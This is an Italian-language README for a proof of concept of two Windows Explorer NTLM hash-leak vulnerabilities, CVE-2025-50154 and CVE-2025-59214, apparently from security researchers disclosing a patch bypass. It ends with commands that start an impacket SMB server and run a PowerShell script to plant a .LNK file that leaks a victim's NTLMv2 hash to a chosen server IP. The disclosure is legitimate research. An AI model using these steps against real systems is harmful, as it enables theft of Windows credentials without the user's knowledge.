
POC per CVE-2025-50154 e CVE-2025-59214, vulnerabilità zero day in Esplora file di Windows che divulgano NTLMv2-SSP senza interazione dell'utente. È un bypass della patch di sicurezza CVE-2025-24054.
Di Ruben Enkaoua e Cymulate
Primo Blog: Zero Click, Un NTLM: Bypass della Patch di Sicurezza Microsoft (CVE-2025-50154)
Secondo Blog: Patchato Due Volte, Ancora Bypassato: Nuova Perdita NTLM (Bypass della Patch CVE-2025-50154)
La vulnerabilità originale, recentemente patchata, era una divulgazione di hash NTLM a zero click attivata quando explorer.exe renderizzava l'icona di un file .LNK la cui icona era ospitata su un server SMB remoto.
Dopo la patch, explorer.exe non carica più le icone da percorsi SMB remoti, impedendo la divulgazione automatica degli hash NTLM.
Aggiornamento: la patch per CVE-2025-50154 non ha funzionato affatto. L'abbiamo segnalato e alla vulnerabilità è stato assegnato un nuovo CVE: CVE-2025-59214. Il POC è valido per entrambi i CVE.
Creando un file .LNK con:
Il processo explorer.exe recupererà comunque il file remoto per estrarre l'icona PE dalle sue risorse RT_GROUP_ICON e RT_ICON.

# put the binary (for example Taskmgr.exe) in the directory and run the SMB server.
impacket-smbserver share . -smb2support
# Replace the values with the path, the responder server IP and the file name on the server. Note: It can take 20 to 30 seconds.
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"